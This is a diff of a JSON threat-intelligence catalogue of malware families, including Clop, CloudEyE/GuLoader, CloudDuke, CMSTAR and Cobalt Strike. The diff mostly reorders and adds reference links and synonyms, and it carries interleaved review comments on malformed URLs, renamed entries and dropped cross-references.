- "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html",
- "https://www.bleepingcomputer.com/news/security/indiabulls-group-hit-by-clop-ransomware-gets-24h-leak-deadline/",
- "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
- "https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti",
- "https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot",
- "https://www.carbonblack.com/blog/cb-tau-threat-intelligence-notification-cryptomix-clop-ransomware-disables-startup-repair-removes-edits-shadow-volume-copies/",
- "https://asec.ahnlab.com/wp-content/uploads/2021/01/Analysis_ReportCLOP_Ransomware.pdf",
- "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities",
- "https://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-English-088056baf01242409a6e9f844f0c5f2e",
- "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shifruvalnika-ta-nanesenni-inozemnim-kompaniyam-piv-milyarda-dolariv-zbitkiv/",
- "https://www.zdnet.com/article/german-tech-giant-software-ag-down-after-ransomware-attack/",
- "https://www.flashpoint-intel.com/blog/cl0p-and-revil-escalate-their-ransomware-tactics/",
- "https://github.com/Tera0017/TAFOF-Unpacker",
- "https://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-c26daec604da4db6b3c93e26e6c7aa26",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://www.splunk.com/en_us/blog/security/clop-ransomware-detection-threat-research-release-april-2021.html",
- "https://github.com/albertzsigovits/malware-notes/blob/master/Clop.md",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
- "https://www.youtube.com/watch?v=PqGaZgepNTE",
- "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/clop-ransomware/",
- "https://www.boho.or.kr/filedownload.do?attach_file_seq=2808&attach_file_id=EpF2808.pdf",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://www.vice.com/en/article/wx5eyx/meet-the-ransomware-gang-behind-one-of-the-biggest-supply-chain-hacks-ever",
"https://www.splunk.com/en_us/blog/security/detecting-clop-ransomware.html",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
+ "https://www.binance.com/en/blog/421499824684902240/Binance-Helps-Take-Down-Cybercriminal-Ring-Laundering-%24500M-in-Ransomware-Attacks",
+ "https://www.bleepingcomputer.com/news/security/cryptomix-clop-ransomware-says-its-targeting-networks-not-computers/",
"https://www.trendmicro.com/en_in/research/21/k/global-operations-lead-to-arrests-of-alleged-members-of-gandcrab.html",
- "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672",
- "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
- "https://asec.ahnlab.com/en/19542/",
+ "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104",
"https://actu.fr/normandie/rouen_76540/une-rancon-apres-cyberattaque-chu-rouen-ce-reclament-pirates_29475649.html",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.prodaft.com/m/reports/TeslaGun_TLPWHITE.pdf",
+ "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
+ "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Clop.md",
+ "https://github.com/Tera0017/TAFOF-Unpacker",
+ "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities",
+ "https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/",
+ "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/",
+ "https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
+ "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672",
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/clop-ransomware/",
+ "https://www.youtube.com/watch?v=PqGaZgepNTE",
+ "https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
+ "https://twitter.com/darb0ng/status/1338692764121251840",
+ "https://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-English-088056baf01242409a6e9f844f0c5f2e",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://www.bleepingcomputer.com/news/security/microsoft-links-raspberry-robin-worm-to-clop-ransomware-attacks/",
+ "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html",
+ "https://www.hornetsecurity.com/en/security-information/clop-clop-ta505-html-malspam-analysis/",
+ "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
"https://krebsonsecurity.com/2021/06/ukrainian-police-nab-six-tied-to-clop-ransomware/",
- "https://www.bleepingcomputer.com/news/security/cryptomix-clop-ransomware-says-its-targeting-networks-not-computers/"
+ "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2",
+ "https://www.bleepingcomputer.com/news/security/ransomware-gang-says-they-stole-2-million-credit-cards-from-e-land/",
+ "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do",
+ "https://www.carbonblack.com/blog/cb-tau-threat-intelligence-notification-cryptomix-clop-ransomware-disables-startup-repair-removes-edits-shadow-volume-copies/",
+ "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shifruvalnika-ta-nanesenni-inozemnim-kompaniyam-piv-milyarda-dolariv-zbitkiv/",
+ "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
+ "https://www.bleepingcomputer.com/news/security/ransomware-gang-urges-victims-customers-to-demand-a-ransom-payment/",
+ "https://www.vice.com/en/article/wx5eyx/meet-the-ransomware-gang-behind-one-of-the-biggest-supply-chain-hacks-ever",
+ "https://www.zdnet.com/article/german-tech-giant-software-ag-down-after-ransomware-attack/",
+ "https://therecord.media/ukrainian-police-arrest-clop-ransomware-members-seize-server-infrastructure/",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf",
+ "https://www.mandiant.com/resources/mandiant-red-team-emulates-fin11-tactics",
+ "https://www.bleepingcomputer.com/news/security/ta505-hackers-behind-maastricht-university-ransomware-attack/",
+ "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-clop",
+ "https://www.zdnet.com/article/croatias-largest-petrol-station-chain-impacted-by-cyber-attack/",
+ "https://www.splunk.com/en_us/blog/security/clop-ransomware-detection-threat-research-release-april-2021.html",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.bleepingcomputer.com/news/security/indiabulls-group-hit-by-clop-ransomware-gets-24h-leak-deadline/",
+ "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/",
+ "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti",
+ "https://www.cert.ssi.gouv.fr/cti/CERTFR-2019-CTI-009/",
+ "https://asec.ahnlab.com/wp-content/uploads/2021/01/Analysis_ReportCLOP_Ransomware.pdf",
+ "https://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-c26daec604da4db6b3c93e26e6c7aa26",
+ "https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824",
+ "https://www.boho.or.kr/filedownload.do?attach_file_seq=2808&attach_file_id=EpF2808.pdf",
+ "https://securelist.com/modern-ransomware-groups-ttps/106824/",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
+ "https://unit42.paloaltonetworks.com/clop-ransomware/",
+ "https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://medium.com/s2wlab/operation-synctrek-e5013df8d167",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://github.com/albertzsigovits/malware-notes/blob/master/Clop.md",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://www.secureworks.com/research/threat-profiles/gold-tahoe",
+ "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/",
+ "https://asec.ahnlab.com/en/19542/",
+ "https://www.flashpoint-intel.com/blog/cl0p-and-revil-escalate-their-ransomware-tactics/",
+ "https://medium.com/@Sebdraven/unpacking-clop-416b83718e0f",
+ "https://www.bleepingcomputer.com/news/security/clop-ransomware-gang-is-back-hits-21-victims-in-a-single-month/"
],
"synonyms": [],
"type": []
},
"uuid": "8071f2d8-cc44-4682-845b-6f39a9f8b587",
- "value": "Clop"
+ "value": "Clop (Windows)"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudburst",
+ "https://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "3f320960-77a2-4525-8d19-95b6028ec0d5",
+ "value": "CLOUDBURST"
},
{
"description": "CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye",
- "https://www.vmray.com/cyber-security-blog/guloader-evasion-techniques-threat-bulletin/",
- "https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943",
- "https://kienmanowar.wordpress.com/2020/06/27/quick-analysis-note-about-guloader-or-cloudeye/",
- "https://research.checkpoint.com/2020/guloader-cloudeye/",
- "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors",
- "https://labs.vipre.com/unloading-the-guloader/",
- "https://twitter.com/VK_Intel/status/1252678206852907011",
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.guloader",
- "https://inquest.net/blog/2022/08/29/office-files-rtf-files-shellcode-and-more-shenanigans",
- "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf",
- "https://blog.vincss.net/2020/05/re014-guloader-antivm-techniques.html",
- "https://clickallthethings.wordpress.com/2021/03/06/oleobject1-bin-ole10native-shellcode/",
- "https://malwation.com/malware-config-extraction-diaries-1-guloader/",
- "https://forensicitguy.github.io/guloader-executing-shellcode-callbacks/",
- "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/",
- "https://www.youtube.com/watch?v=-FxyzuRv6Wg",
- "https://research.checkpoint.com/2020/threat-actors-migrating-to-the-cloud/",
- "https://www.youtube.com/watch?v=N0wAh26wShE",
- "https://www.proofpoint.com/us/blog/threat-insight/hakbit-ransomware-campaign-against-germany-austria-switzerland",
- "https://www.proofpoint.com/us/threat-insight/post/guloader-popular-new-vb6-downloader-abuses-cloud-services",
- "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter",
- "https://cert-agid.gov.it/news/malware/tecniche-per-semplificare-lanalisi-del-malware-guloader/",
- "https://cert.pl/en/posts/2021/04/keeping-an-eye-on-guloader-reverse-engineering-the-loader/",
- "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/",
- "https://www.vmray.com/cyber-security-blog/azorult-delivered-by-guloader-malware-analysis-spotlight/",
- "https://www.youtube.com/watch?v=K3Yxu_9OUxU",
- "https://blog.morphisec.com/guloader-the-rat-downloader",
- "https://experience.mandiant.com/trending-evil-2/p/1",
- "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/playing-with-guloader-anti-vm-techniques-malware/",
- "https://twitter.com/TheEnergyStory/status/1240608893610459138",
- "https://twitter.com/VK_Intel/status/1257206565146370050",
- "https://blog.malwarebytes.com/scams/2020/08/sba-phishing-scams-from-malware-to-advanced-social-engineering/",
- "https://www.crowdstrike.com/blog/guloader-malware-analysis/",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
"https://labs.k7computing.com/?p=20156",
- "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update",
- "https://hidocohen.medium.com/guloaders-anti-analysis-techniques-e0d4b8437195",
- "https://elis531989.medium.com/dancing-with-shellcodes-cracking-the-latest-version-of-guloader-75083fb15cb4",
- "https://www.vmray.com/cyber-security-blog/malware-analysis-spotlight-guloader",
"https://www.joesecurity.org/blog/3535317197858305930",
- "https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728",
- "https://twitter.com/TheEnergyStory/status/1239110192060608513",
- "https://twitter.com/VK_Intel/status/1255537954304524288",
- "https://labs.k7computing.com/?p=21725Lokesh",
- "https://www.fortinet.com/blog/threat-research/spoofed-saudi-purchase-order-drops-guloader-part-two",
+ "https://blog.morphisec.com/guloader-the-rat-downloader",
+ "https://threatresearch.ext.hp.com/malware-campaigns-targeting-african-banking-sector/",
+ "https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943",
+ "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf",
"https://twitter.com/sysopfb/status/1258809373159305216",
- "https://threatresearch.ext.hp.com/malware-campaigns-targeting-african-banking-sector/"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.guloader",
+ "https://www.youtube.com/watch?v=-FxyzuRv6Wg",
+ "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter",
+ "https://research.checkpoint.com/2020/guloader-cloudeye/",
+ "https://twitter.com/TheEnergyStory/status/1240608893610459138",
+ "https://cert.pl/en/posts/2021/04/keeping-an-eye-on-guloader-reverse-engineering-the-loader/",
+ "https://www.youtube.com/watch?v=N0wAh26wShE",
+ "https://experience.mandiant.com/trending-evil-2/p/1",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://www.youtube.com/watch?v=K3Yxu_9OUxU",
+ "https://www.crowdstrike.com/blog/guloader-dissection-reveals-new-anti-analysis-techniques-and-code-injection-redundancy/",
+ "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/",
+ "https://twitter.com/TheEnergyStory/status/1239110192060608513",
+ "https://research.checkpoint.com/2020/threat-actors-migrating-to-the-cloud/",
+ "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/",
+ "https://hidocohen.medium.com/guloaders-anti-analysis-techniques-e0d4b8437195",
+ "https://www.fortinet.com/blog/threat-research/spoofed-saudi-purchase-order-drops-guloader-part-two",
+ "https://www.spamhaus.com/resource-center/dissecting-the-new-shellcode-based-variant-of-guloader-cloudeye/",
+ "https://twitter.com/VK_Intel/status/1255537954304524288",
+ "https://www.vmray.com/cyber-security-blog/guloader-evasion-techniques-threat-bulletin/",
+ "https://www.vmray.com/cyber-security-blog/azorult-delivered-by-guloader-malware-analysis-spotlight/",
+ "https://www.microsoft.com/en-us/security/blog/2023/04/13/threat-actors-strive-to-cause-tax-day-headaches/",
+ "https://forensicitguy.github.io/guloader-executing-shellcode-callbacks/",
+ "https://www.crowdstrike.com/blog/guloader-malware-analysis/",
+ "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update",
+ "https://www.proofpoint.com/us/threat-insight/post/guloader-popular-new-vb6-downloader-abuses-cloud-services",
+ "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/playing-with-guloader-anti-vm-techniques-malware/",
+ "https://blog.vincss.net/2020/05/re014-guloader-antivm-techniques.html",
+ "https://elis531989.medium.com/dancing-with-shellcodes-cracking-the-latest-version-of-guloader-75083fb15cb4",
+ "https://kienmanowar.wordpress.com/2020/06/27/quick-analysis-note-about-guloader-or-cloudeye/",
+ "https://cert-agid.gov.it/news/malware/tecniche-per-semplificare-lanalisi-del-malware-guloader/",
+ "https://twitter.com/VK_Intel/status/1252678206852907011",
+ "https://www.proofpoint.com/us/blog/threat-insight/hakbit-ransomware-campaign-against-germany-austria-switzerland",
+ "https://inquest.net/blog/2022/08/29/office-files-rtf-files-shellcode-and-more-shenanigans",
+ "https://www.vmray.com/cyber-security-blog/malware-analysis-spotlight-guloader",
+ "https://clickallthethings.wordpress.com/2021/03/06/oleobject1-bin-ole10native-shellcode/",
+ "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors",
+ "https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728",
+ "https://blog.malwarebytes.com/scams/2020/08/sba-phishing-scams-from-malware-to-advanced-social-engineering/",
+ "https://twitter.com/VK_Intel/status/1257206565146370050",
+ "https://medium.com/@ZainWare/analyzing-guloader-42c1d6a73dfa",
+ "https://malwation.com/malware-config-extraction-diaries-1-guloader/",
+ "https://labs.k7computing.com/?p=21725Lokesh",
+ "https://labs.vipre.com/unloading-the-guloader/"
],
"synonyms": [
"GuLoader",
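Review bot: the re-added reference "https://labs.k7computing.com/?p=21725Lokesh" (removed on the `-` side and added back unchanged lower in the list) looks malformed: the trailing "Lokesh" reads like an author name fused onto the query string, so the link most likely does not resolve to the intended post. Please check the URL against the upstream source before carrying it over. In the same hunk, "https://labs.bitdefender.com/...?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter" and "https://news.sophos.com/...?cmp=30728" keep tracking parameters that add nothing to the reference and will produce spurious diffs whenever the generator strips or re-adds them; stripping utm_/cmp parameters at import time would keep the refs canonical. Finally, the large block of removed-then-re-added lines here is almost entirely ordering churn: if the generator emitted refs in a deterministic order (for example sorted), a reviewer could see the genuinely new references (such as the cert.pl, CrowdStrike and Unit42 write-ups) at a glance.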
@@ -16936,17 +18030,20 @@
"value": "CloudEyE"
},
{
- "description": "",
+ "description": "F-Secure describes CloudDuke as a malware toolset known to consist of, at least, a downloader, a loader and two backdoor variants. The CloudDuke downloader will download and execute additional malware from a preconfigured location. Interestingly, that location may be either a web address or a Microsoft OneDrive account. Both CloudDuke backdoor variants support simple backdoor functionality, similar to SeaDuke. While one variant will use a preconfigured C&C server over HTTP or HTTPS, the other variant will use a Microsoft OneDrive account to exchange commands and stolen data with its operators.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cloud_duke",
"https://www.f-secure.com/weblog/archives/00002822.html"
],
- "synonyms": [],
+ "synonyms": [
+ "CloudLook",
+ "MiniDionis"
+ ],
"type": []
},
"uuid": "40baac36-2fd0-49b3-b05b-1087d60f4f2c",
- "value": "Cloud Duke"
+ "value": "CloudDuke"
},
{
"description": "",
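Review bot: the rename of "value" from "Cloud Duke" to "CloudDuke" under the unchanged uuid "40baac36-2fd0-49b3-b05b-1087d60f4f2c" changes the cluster's tag string, since MISP derives galaxy tags from the value (misp-galaxy:<type>="<value>"); events already tagged with the old value will no longer match this cluster after the update. Consider adding "Cloud Duke" alongside "CloudLook" and "MiniDionis" in the new "synonyms" array, or at least calling out the rename in the commit message so downstream users can re-tag. The populated description and the two synonyms are otherwise consistent with the F-Secure reference already listed in "refs".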
@@ -16966,25 +18063,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cmstar",
- "https://unit42.paloaltonetworks.com/unit42-threat-actors-target-government-belarus-using-cmstar-trojan",
- "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan",
"https://twitter.com/ClearskySec/status/963829930776723461",
- "https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/"
+ "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan",
+ "https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/",
+ "https://unit42.paloaltonetworks.com/unit42-threat-actors-target-government-belarus-using-cmstar-trojan"
],
"synonyms": [
"meciv"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "e81b96a2-22e9-445e-88c7-65b67c2299ec",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "e4e15ab4-9ba6-444a-b154-2854757e792e",
"value": "CMSTAR"
},
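Review bot: this hunk silently drops the whole "related" array for CMSTAR, removing the "similar" link to dest-uuid "e81b96a2-22e9-445e-88c7-65b67c2299ec" (with its estimative-language tag), while the cluster's own uuid is unchanged. If the target cluster still exists, that cross-reference is lost and should be kept; if the removal is deliberate (for example because related entries are now generated elsewhere), please state that in the commit message. The accompanying reorder of the three Palo Alto references is also not alphabetical (the 2017 researchcenter URL is placed before the 2016 one), which suggests the generator's ordering is not stable and will keep producing this kind of churn.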
@@ -16999,15 +18087,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "92628a72-c874-11e8-a094-ebbb3bd1f412",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "7acd9a27-f550-4c47-9fc8-429b61b04217",
"value": "CoalaBot"
},
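Review bot: same concern as for the other cluster edits in this patch: the "related" array for CoalaBot, carrying the "similar" relationship to dest-uuid "92628a72-c874-11e8-a094-ebbb3bd1f412", is deleted with no replacement and no explanation, while nothing else in the cluster changes. Removing cross-cluster relationships is a content change, not a refresh of references, so either keep the array or document why the link is being dropped.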
@@ -17016,8 +18095,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cobaltmirage_tunnel",
- "https://www.secureworks.com/blog/cobalt-mirage-conducts-ransomware-operations-in-us",
- "https://www.deepinstinct.com/blog/iranian-threat-actor-continues-to-develop-mass-exploitation-tools"
+ "https://www.deepinstinct.com/blog/iranian-threat-actor-continues-to-develop-mass-exploitation-tools",
+ "https://www.secureworks.com/blog/cobalt-mirage-conducts-ransomware-operations-in-us"
],
"synonyms": [],
"type": []
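Review bot: this hunk only swaps the order of the two existing references (deepinstinct now before secureworks, i.e. alphabetical) with no content change; elsewhere in the same patch the refs lists are not sorted this way, so the ordering appears to depend on the generator's input order rather than a fixed rule. Sorting refs deterministically in the generator would eliminate these no-op hunks and make real reference additions easier to review.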
@@ -17030,611 +18109,649 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike",
- "https://thedfirreport.com/2021/06/20/from-word-to-lateral-movement-in-1-hour/",
- "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon",
- "https://mp.weixin.qq.com/s/peIpPJLt4NuJI1a31S_qbQ",
- "https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-two/",
- "https://news.sophos.com/en-us/2021/10/04/atom-silo-ransomware-actors-use-confluence-exploit-dll-side-load-for-stealthy-attack/",
- "https://blog.malwarebytes.com/threat-intelligence/2021/11/a-multi-stage-powershell-based-attack-targets-kazakhstan/",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/",
- "https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure",
- "https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/",
- "https://malcat.fr/blog/lnk-forensic-and-config-extraction-of-a-cobalt-strike-beacon/",
- "https://unit42.paloaltonetworks.com/fireeye-red-team-tool-breach/",
- "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html",
- "https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/",
- "https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/",
- "http://www.secureworks.com/research/threat-profiles/gold-kingswood",
- "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/",
- "https://www.intezer.com/blog/malware-analysis/cobalt-strike-detect-this-persistent-threat/",
- "https://wbglil.gitbook.io/cobalt-strike/",
- "https://www.scmagazine.com/brief/breach/novel-obfuscation-leveraged-by-hive-ransomware",
- "https://unit42.paloaltonetworks.com/hancitor-infections-cobalt-strike/",
- "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/",
- "https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489",
- "https://www.getrevue.co/profile/80vul/issues/hunting-cobalt-strike-dns-redirectors-by-using-zoomeye-580734",
- "https://securityscorecard.com/blog/securityscorecard-finds-usaid-hack-much-larger-than-initially-thought",
- "https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/",
- "https://malwarelab.eu/posts/fin6-cobalt-strike/",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://asec.ahnlab.com/en/31811/",
- "https://www.huntress.com/blog/cybersecurity-advisory-vmware-horizon-servers-actively-being-hit-with-cobalt-strike",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sodinokibi-ransomware-cobalt-strike-pos",
- "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-275a",
- "https://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html",
- "https://www.prodaft.com/m/reports/WizardSpider_TLPWHITE_v.1.4.pdf",
- "https://www.trendmicro.com/en_us/research/21/a/earth-wendigo-injects-javascript-backdoor-to-service-worker-for-.html",
- "https://kienmanowar.wordpress.com/2021/09/06/quick-analysis-cobaltstrike-loader-and-shellcode/",
- "https://connormcgarr.github.io/thread-hijacking/",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
- "https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf",
- "https://www.contextis.com/en/blog/dll-search-order-hijacking",
- "https://www.mandiant.com/media/12596/download",
- "https://malwareandstuff.com/mustang-panda-joins-the-covid19-bandwagon/",
- "https://blog.prevailion.com/wizard-spider-continues-to-confound-4298370f6903",
- "https://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/",
- "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone/",
- "https://www.crowdstrike.com/blog/four-popular-defensive-evasion-techniques-in-2021/",
- "https://github.com/infinitumitlabs/Karakurt-Hacking-Team-CTI",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-011.pdf",
- "https://redcanary.com/blog/intelligence-insights-december-2021",
- "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/",
- "https://medium.com/walmartglobaltech/cobaltstrike-uuid-stager-ca7e82f7bb64",
